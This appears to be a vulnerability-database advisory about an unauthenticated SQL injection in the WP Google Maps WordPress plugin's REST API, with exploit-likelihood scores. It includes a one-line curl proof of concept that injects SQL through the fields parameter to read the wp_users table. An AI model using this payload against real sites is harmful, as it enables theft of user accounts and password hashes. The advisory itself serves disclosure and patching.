Lucene search

K
wpexploitWpvulndbWPEX-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA
HistoryApr 02, 2019 - 12:00 a.m.

WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection

2019-04-0200:00:00
wpvulndb
78

0.973 High

EPSS

Percentile

99.9%

The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.

curl -k --silent "http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D*+from+wp_users+--+-"

0.973 High

EPSS

Percentile

99.9%